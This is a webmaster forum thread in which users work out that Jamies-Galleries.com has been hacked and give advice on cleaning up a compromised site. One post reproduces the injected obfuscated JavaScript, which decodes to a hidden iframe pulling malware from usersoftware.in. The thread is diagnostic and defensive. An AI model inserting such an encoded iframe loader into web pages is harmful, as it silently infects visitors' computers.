Jamies-Galleries.com ??? Zango?
 

Looks like Jamies-Galleries.com wen't Zango or was hacked..

anyone?

don't think that has anything to do with Zango

what are you referring to there?

I think depending on your security settings it attempts to auto-run some kind of media file, I'm not sure what it is up to but it doesn't look good.:2 cents:

not noticing anything here myself

my ie says its " webcam upload networking and imaging from yahoo! Inc "

Not picking up anything here.maybe spyware?

)<script·type="text/javascript">function·Decode(){var·temp="",i,c=0,ou t="";·var·str="60!115!99!114!105!112!116!32!108!97 !110!103!117!97!103!101!61!34!74!97!118!97!83!99!1 14!105!112!116!34!62!118!97!114!32!108!61!34!102!3 4!59!103!111!111!103!108!101!61!34!97!34!59!121!97 !110!100!61!34!114!34!59!100!111!99!117!109!101!11 0!116!46!119!114!105!116!101!40!39!60!105!39!43!10 8!43!39!114!39!43!103!111!111!103!108!101!43!39!10 9!101!32!115!39!43!121!97!110!100!43!39!99!61!34!1 04!116!116!112!58!47!47!117!115!101!39!43!121!97!1 10!100!43!39!115!111!39!43!108!43!39!116!119!39!43 !103!111!111!103!108!101!43!39!114!101!46!105!110! 47!116!115!47!105!110!46!99!103!105!63!51!52!54!34 !32!39!43!108!43!39!114!39!43!103!111!111!103!108! 101!43!39!109!101!98!111!39!43!121!97!110!100!43!3 9!100!101!39!43!121!97!110!100!43!39!61!48!32!119! 105!39!43!39!100!116!104!39!43!39!61!48!32!104!101 !39!43!39!105!103!104!39!43!39!116!61!48!62!60!47! 105!39!43!108!43!39!114!39!43!103!111!111!103!108! 101!43!39!109!101!62!39!41!59!60!47!115!99!114!105 !112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++;·out=out+String.fromCharCode(temp);temp="" ;}document.write(out);}Decode();</script>

Too many damn numbers!

it loads a javascript from

usersoftware.in/ts/in.cgi?346

actually we didnt go zango no.. so this would either be a hack or a pc infected with spyware.

I just checked the site and our scripts and cant find anything supicious. Can anyone please post the URL they are on when they experience it?

thanks for info

WTF??? :upsidedow:upsidedow:upsidedow

Jamies-Galleries.com is hacked with that javascript code i posted above

for whatever reason you may not be seeing it you can view it thru a proxy on a webpage

http://www.rexswain.com/httpview.html

jus go there enter the url and you will see the hacked code added

Home page has the script.. Comes after the second header image.

Either you are hackored or you are trying to make some extra cash.. But for trades sakes, you had better remove that shit quick.

If you are looking at the page and it isn't there then you REALLY have problems because it means you are now running a hacked version of apache and need to talk to your host about 1) reinstalling a non-hacked version and 2) setting up a trip wire to let you know when MD5 checksum on apache doesn't match.

what exactly is that script attempting to do?

when I loaded the page the first time, it caused my windows media player to open and the an out of memory error window popped up in windows media player

I see it browsing from the midwestern United States with Opera 9.

i don't even want to open that page

Believe me,

something is surely off about it, smokey hit the nail on the head.

Now I have some god damn fake Windows Security window asking me if I want to buy some horse shit product, and I can't get it off.

Gals4free, your welcome :)

Got this tonight when a gallery submission went to their 404

"Safe Browsing
Diagnostic page for jamies-galleries.com

What is the current listing status for jamies-galleries.com?

Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 10 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2008-11-18, and the last time suspicious content was found on this site was on 2008-11-18.

Malicious software includes 1 scripting exploit(s). Successful infection resulted in an average of 1 new processes on the target machine.

Malicious software is hosted on 1 domain(s), including ftpiframer.org. "

Maybe it's an hack that shows up only for every 10th visitor or so, that's already pretty common these days cause it makes it harder for the site owner to track it down.

I've not visited the site, so I don't know which script's you're using, but many TGPs/MGPs get hacked lately. Go take a close look at your toplist templates, cause they're often used to insert malicious code, and check which files have been changed/updated on your server within the last 48h. If someone has hacked your site he most likely added or updated a file, and didn't change the timestamp.

Oh, and if you've found out what happend please post it on the boards, so we can take care of our sites too ;)

Whoa... I know Kung Fu.